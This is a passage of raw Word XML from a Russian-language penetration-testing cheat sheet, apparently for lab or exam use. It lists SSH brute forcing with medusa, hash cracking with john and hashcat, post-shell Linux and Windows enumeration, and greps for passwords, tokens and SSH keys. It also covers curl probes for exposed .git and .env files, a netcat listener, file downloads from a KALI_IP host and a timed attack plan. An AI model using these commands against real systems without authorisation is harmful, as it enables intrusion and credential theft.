          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>medusa -h $TARGET -u admin -P passwords-small.txt -M ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Альтернатива Hydra для сетевой аутентификации.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Синтаксис зависит от модуля.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>14. Hash cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hashid 'HASH'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Определяет возможные типы хэша.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>hash-identifier — альтернативный вариант.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>john hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Запускает John с базовыми настройками.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>john --wordlist=WORDLIST hash.txt — wordlist mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>john --show hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Показывает найденные пароли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Запускай после работы John.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Пример MD5 + wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>-m должен соответствовать типу хэша.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hashcat -m 100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Пример SHA1 + wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверь тип заранее.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hashcat -m 1400 -a 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Пример SHA-256 + wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Не угадывай режим -m.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Пример NTLM + wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Актуально для Windows/NTLM-данных.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>15. Linux Enumeration после shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>id</w:t>
        <w:br/>
        <w:t>whoami</w:t>
        <w:br/>
        <w:t>hostname</w:t>
        <w:br/>
        <w:t>uname -a</w:t>
        <w:br/>
        <w:t>cat /etc/os-release</w:t>
        <w:br/>
        <w:br/>
        <w:t>ip -br a</w:t>
        <w:br/>
        <w:t>ip route</w:t>
        <w:br/>
        <w:t>ss -lntup</w:t>
        <w:br/>
        <w:t>ps auxf</w:t>
        <w:br/>
        <w:br/>
        <w:t>cat /etc/passwd</w:t>
        <w:br/>
        <w:t>cat /etc/group</w:t>
        <w:br/>
        <w:t>sudo -l</w:t>
        <w:br/>
        <w:br/>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>find / -perm -2000 -type f 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>getcap -r / 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>cat /etc/crontab</w:t>
        <w:br/>
        <w:t>ls -la /etc/cron*</w:t>
        <w:br/>
        <w:t>crontab -l 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>find /etc /opt /usr/local -writable -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Приоритет: sudo -l → SUID/SGID → capabilities → cron/systemd → writable scripts/configs → credentials → локальные сервисы.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>16. Поиск секретов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>find /var/www /opt /etc -type f \( -name "*.conf" -o -name "*.ini" -o -name "*.env" -o -name "*.yaml" -o -name "*.yml" \) 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>grep -RniE 'password|passwd|pwd|secret|token|api_key|apikey' /etc /opt /var/www 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>history</w:t>
        <w:br/>
        <w:t>cat ~/.bash_history 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>find /home /root -type f \( -name "id_rsa" -o -name "id_ed25519" -o -name "authorized_keys" \) 2&gt;/dev/null</w:t>
        <w:br/>
        <w:br/>
        <w:t>find /var/www -type f \( -name "*.bak" -o -name "*.old" -o -name "*.zip" -o -name "*.tar.gz" \) 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>17. Windows Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
        <w:br/>
        <w:t>hostname</w:t>
        <w:br/>
        <w:t>ipconfig /all</w:t>
        <w:br/>
        <w:t>route print</w:t>
        <w:br/>
        <w:t>net user</w:t>
        <w:br/>
        <w:t>net localgroup</w:t>
        <w:br/>
        <w:t>systeminfo</w:t>
        <w:br/>
        <w:t>tasklist</w:t>
        <w:br/>
        <w:t>netstat -ano</w:t>
        <w:br/>
        <w:t>whoami /priv</w:t>
        <w:br/>
        <w:t>whoami /groups</w:t>
        <w:br/>
        <w:t>sc query</w:t>
        <w:br/>
        <w:t>schtasks /query /fo LIST /v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ищи интересные привилегии, группы, сервисы, scheduled tasks, локальные конфиги и сохранённые credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>18. Searchsploit / Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>searchsploit 'Apache 2.4'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Ищет локальные записи Exploit-DB по продукту/версии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>searchsploit --cve CVE-YYYY-NNNN — поиск по CVE.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>msfconsole</w:t>
        <w:br/>
        <w:t>search apache</w:t>
        <w:br/>
        <w:t>search type:exploit samba</w:t>
        <w:br/>
        <w:t>info MODULE</w:t>
        <w:br/>
        <w:t>use MODULE</w:t>
        <w:br/>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Совпадение версии не означает наличие уязвимости. Сначала проверь условия эксплуатации и конфигурацию.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>19. Git / backups / debug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>curl http://$TARGET/.git/HEAD</w:t>
        <w:br/>
        <w:t>curl http://$TARGET/.env</w:t>
        <w:br/>
        <w:t>curl http://$TARGET/backup.zip</w:t>
        <w:br/>
        <w:t>curl http://$TARGET/config.bak</w:t>
        <w:br/>
        <w:t>curl http://$TARGET/server-status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Проверяй также .svn, .git, backups, old, dev, test, debug, config, dump, db.sql, web.config, settings.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>20. curl — ручные HTTP-запросы</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -v http://$TARGET/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подробный HTTP-запрос/ответ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Полезно для redirect, cookies, заголовков.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -X POST -d 'username=admin&amp;password=test' http://$TARGET/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Отправляет POST form-data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Имена параметров бери из Burp/HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -b 'session=VALUE' http://$TARGET/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Отправляет cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Несколько: -b 'a=1; b=2'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>curl -c cookies.txt -b cookies.txt http://$TARGET/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Сохраняет и использует cookie jar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Удобно для последовательных запросов.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>21. Netcat / файлы в лаборатории</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Слушает TCP-порт 4444.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Меняй порт согласно стенду.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nc $TARGET 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Подключается к TCP-порту.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>Удобно для диагностики.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>nc -zv $TARGET 22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Что делает: </w:t>
      </w:r>
      <w:r>
        <w:t>Проверяет доступность TCP-порта.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Варианты: </w:t>
      </w:r>
      <w:r>
        <w:t>nc -zv TARGET 20-100 — диапазон.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server 8000</w:t>
        <w:br/>
        <w:t>wget http://KALI_IP:8000/file</w:t>
        <w:br/>
        <w:t>curl -O http://KALI_IP:8000/file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>22. План на 6 часов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</w:tcPr>
          <w:p>
            <w:r>
              <w:t>Время</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Действие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0:00–0:15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Задание, IP/FQDN, ограничения</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Карта целей</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0:15–0:45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Discovery + быстрый Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Хосты/порты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>0:45–2:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Версии, web, SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>2:00–3:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Credentials / targeted testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Доступы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>3:00–4:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Initial access + local enum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>4:00–5:00</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>PrivEsc + secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>root/admin/ключи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>5:00–5:30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Повторная разведка/lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3437"/>
